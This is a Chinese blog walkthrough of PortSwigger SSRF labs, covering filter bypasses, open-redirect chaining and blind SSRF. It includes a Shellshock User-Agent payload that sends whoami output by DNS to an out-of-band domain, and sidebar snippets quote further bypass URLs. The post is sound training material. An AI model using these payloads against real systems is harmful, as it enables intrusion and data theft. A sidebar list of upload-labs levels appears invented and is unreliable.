SSRF-bp靶场

最新推荐文章于 2023-10-12 10:15:54 发布
最新推荐文章于 2023-10-12 10:15:54 发布
阅读量328 收藏
点赞数
分类专栏: bp靶场 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53510194/article/details/129781158
版权

All labs | Web Security Academy

1.黑名单绕过

SSRF with blacklist-based input filter

1.过滤127.0.0.1

127.1

2.过滤目录,如admin

admin二次url编码

2.白名单绕过

SSRF with whitelist-based input filter

1.要求域名必须是stock.weliketoshop.net(常规的请求地址)

利用点:url规范

url中的@:<用户名>@<域名>

url中的#:<域名>#<位置标识符>

将#二次url编码实现绕过

@绕过白名单,解码出来的#锁定127.0.0.1

3.重定向利用

SSRF with filter bypass via open redirection vulnerability

解码后的stockApi

在另一翻页处(next product),发现类似的path参数,内容为路径

猜测两处公用一个api(stockApi),构造新的stockApi进行测试

利用爆破手段获得管理员所在的内网ip地址

找到删除用户的url,改包放包

4.盲ssrf-带外检测

Blind SSRF with out-of-band detection

测试点

页面请求中获取了referer

将其改为bp的站点

成功回显

5.盲SSRF-Sellshock利用

Blind SSRF with Shellshock exploitation

插件扫描出Referer和User-Agent存在SSRF

User-agent()输入 { :; }; /usr/bin/nslookup $(whoami).bp域名 执行命令

Referer爆破内网站点

存在成功执行的机器

输入得到的用户名完成实验

 

moonforr
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ssrf-req-filter:在 NodeJS 中发送请求时防止 SSRF 的模块。 阻止对本地和私有 IP 地址的请求
05-31
ssrf-req-filter - 防止 SSRF 攻击 :shield: 服务器端请求伪造 (SSRF) SSRF 是一种攻击媒介,它滥用应用程序与内部/外部网络或机器本身进行交互。 此向量的促成因素之一是 URL 处理不当。 安装 npm install ssrf-req-filter 用法 轴: const ssrfFilter = require('ssrf-req-filter'); const url = 'https://127.0.0.1' axios.get(url, {httpAgent: ssrfFilter(url), httpsAgent: ssrfFilter(url)}) .then((response) => { console.log(`Success`); }) .catch((error) => {
ssrf-king:用于burp的SSRF插件可在所有请求中自动进行SSRF检测
03-07
:check_mark: 它将很快有一个用户界面来指定您自己的回叫有效负载它将很快能够测试Json和XML 测试SMTP SSRF如何安装/建造git clone https://github.com/ethicalhackingplayground/ssrf-king gradle build 现在可以在...
burp靶场通关教程1
逍遥小哥的博客
10-12 732
因为这是个普通用户的凭据,这里显示false,那么我们访问管理页面把后面的admin=false粘上去 并改为true(如果有admin=就不用粘贴了,我这访问admin管理面本cookie里面没有admin=false)我们先访问robots.txt 这里提示里面存在管理面板的路径(没有做鉴权,通过不受保护的管理功能这个提示,应该直接访问管理面板路径就可以删除carlos用户了)第一这个--是注释,其次为什么要给administrator后面加单引号,因为这是字符串要闭合,不闭合就报错了。
BP爆破DVWA靶场
weixin_64676068的博客
04-06 602
BP破解DVWA靶场
BP靶场中SQL注入练习
剁椒鱼头没剁椒的博客
01-14 1739
Bp靶场有点类似于常见的DVWA靶场、piachu靶场,里面富含多种不同类型的漏洞,并且每个靶场都有针对性,例如sql注入,从最简单的判断开始,逐步的增加难度,并且每一个靶场都附带介绍以及通过方式,能够让新人快速的了解原理并且针对性练习。
SSRF攻击实例解析
Zeker62的博客
08-16 1140
普通版SSRF: 普通版版本的SSRF没有经过任何过滤 直接在请求的API中输入: http://localhost/admin 比如: stockApi=http://localhost/admin Here, the server will fetch(获取) the contents(内容) of the /admin URL and return it to the user. SSRF攻击后端系统: SSRF攻击是操纵了服务器的权限,服务器存储于后端系统 我们可以用爆破的方法,爆破后端系统的I
PortSwigger Academy | Server-side request forgery (SSRF) : 服务器端请求伪造
水榭山寺花烂漫,凤凰集外雁归来。敢与云峰争秀色,妙雨莲花九重开。
01-27 802
文章目录总结什么是SSRF?SSRF攻击有什么影响?常见的SSRF攻击针对服务器本身的SSRF攻击Lab: Basic SSRF against the local serverSSRF攻击其他后端系统Lab: Basic SSRF against another back-end system规避SSRF的常见防御措施具有基于黑名单的输入过滤器的SSRFLab: SSRF with blacklist-based input filter具有基于白名单的输入过滤器的SSRFLab: SSRF with w
Portwigge的Web安全漏洞训练平台SSRF通关
st3pby的博客
11-16 1549
Portwigge的Web安全漏洞训练平台SSRF通关
国光师傅的SSRF靶场docker环境.zip
最新发布
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
SSRF-Testing:SSRF(服务器端请求伪造)测试资源
04-23
SSRF(服务器端请求伪造)测试资源 基于快速URL的绕过: http://google.com:80+&@127.88.23.245:22/#+@google.com:80/ http://127.88.23.245:22/+&@google.com:80#+@google.com:80/ ...
ssrfpll.rar_DQ 锁相环_SSRF-PLL_同步锁相环_锁相环_锁相环 同步
07-14
基于同步坐标系的自建锁相环模块仿真,dq坐标系与matlab自带模块相差90度,新建的dq坐标系是符合中式习惯坐标系
CTFhub_SSRF靶场教程
weixin_58954236的博客
09-09 904
请求的URL中必须包含,来尝试利用URL的一些特殊地方绕过这个限制吧访问题目所给的链接,使用bp抓包此flag看长度可知是假的在浏览器中输入构造的payload得到flag:ctfhub{eecad35d4ef30dfb74eaabe4}提交flag。
Pikachu靶场暴力破解通关
记录学习,一起进步
01-10 1362
Pikachu靶场暴力破解通关
【burpsuite安全练兵场-客户端13】跨来源资源共享(CORS)-4个实验(全)
01-16 8868
BP靶场portswigger-客户端13-跨来源资源共享(CORS)】4个实验-万文步骤
【burpsuite安全练兵场-服务端4】操作系统命令注入-5个实验(全)
12-31 7404
BP靶场portswigger-服务端4-操作系统命令注入】5个实验-千文详细步骤
【burpsuite安全练兵场-服务端3】目录遍历漏洞-6个实验(全)
12-30 4234
BP靶场portswigger-服务端3-目录遍历】6个实验-千文详解步骤
【burpsuite安全练兵场-客户端15】基于DOM的漏洞-7个实验(全)
01-17 8547
BP靶场portswigger-客户端15-基于DOM的漏洞】7个实验-万文详细步骤
【burpsuite安全练兵场-服务端6】信息泄露漏洞-5个实验(全)
01-05 8124
BP靶场portswigger-服务端6-信息泄露漏洞】5个实验-万文详细步骤
SSRF盲打 & Collaborator everywhere
weixin_43263451的博客
10-06 4372
什么是盲SSRF漏洞? 和sql盲注一样,就是不会在响应中得到SSRF攻击的反馈 如何寻找和利用盲SSRF漏洞? 与sql盲注相同,ssrf盲打最佳利用方式就是通过带外技术接收响应结果。也是同样使用burp自带的简易带外平台collaborator。即使有一些HTTP流量会被拦截,也会因为不怎么拦截DNS流量而获取我们想要的结果。 有的情况还可以利用SSRF盲打对目标后端系统进行探测,比如探测目标网络中开放的主机及端口之类的,这些同样也可以通过带外通道接收到。 还有一种情况就是所谓的反弹shell
upload-labs靶场1-21通关
08-17
你好!要通关 upload-labs 靶场的第 1-21 关,你需要依次完成每个关卡的任务。以下是通关每个关卡的一些提示: 1. Level 1 - 文件上传漏洞:尝试上传一个恶意文件,看看能否绕过上传限制。 2. Level 2 - 文件包含漏洞:尝试利用文件包含漏洞,读取服务器上的敏感文件。 3. Level 3 - XXE漏洞:在上传的 XML 文件中尝试触发外部实体注入。 4. Level 4 - SQL注入漏洞:利用输入点进行 SQL 注入攻击,尝试获取数据库中的敏感信息。 5. Level 5 - SSRF漏洞:尝试利用服务器端请求伪造漏洞,发起内部网络请求。 6. Level 6 - 文件上传漏洞2:绕过上传限制,上传一个恶意文件。 7. Level 7 - 文件包含漏洞2:利用文件包含漏洞,读取服务器上的敏感文件。 8. Level 8 - 反序列化漏洞:尝试触发反序列化漏洞,执行恶意代码。 9. Level 9 - 文件上传漏洞3:绕过上传限制,上传一个恶意文件。 10. Level 10 - 文件包含漏洞3:利用文件包含漏洞,读取服务器上的敏感文件。 11. Level 11 - XXE漏洞2:在上传的 XML 文件中触发外部实体注入。 12. Level 12 - SSRF漏洞2:尝试利用服务器端请求伪造漏洞,发起内部网络请求。 13. Level 13 - 文件上传漏洞4:绕过上传限制,上传一个恶意文件。 14. Level 14 - 文件包含漏洞4:利用文件包含漏洞,读取服务器上的敏感文件。 15. Level 15 - SQL注入漏洞2:利用输入点进行 SQL 注入攻击,尝试获取数据库中的敏感信息。 16. Level 16 - 文件上传漏洞5:绕过上传限制,上传一个恶意文件。 17. Level 17 - 文件包含漏洞5:利用文件包含漏洞,读取服务器上的敏感文件。 18. Level 18 - 反序列化漏洞2:尝试触发反序列化漏洞,执行恶意代码。 19. Level 19 - 文件上传漏洞6:绕过上传限制,上传一个恶意文件。 20. Level 20 - 文件包含漏洞6:利用文件包含漏洞,读取服务器上的敏感文件。 21. Level 21 - XXE漏洞3:在上传的 XML 文件中触发外部实体注入。 请注意,在完成每个关卡时,要仔细阅读相关提示和代码,理解漏洞的原理,并尝试不同的方法来解决问题。祝你顺利通关!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值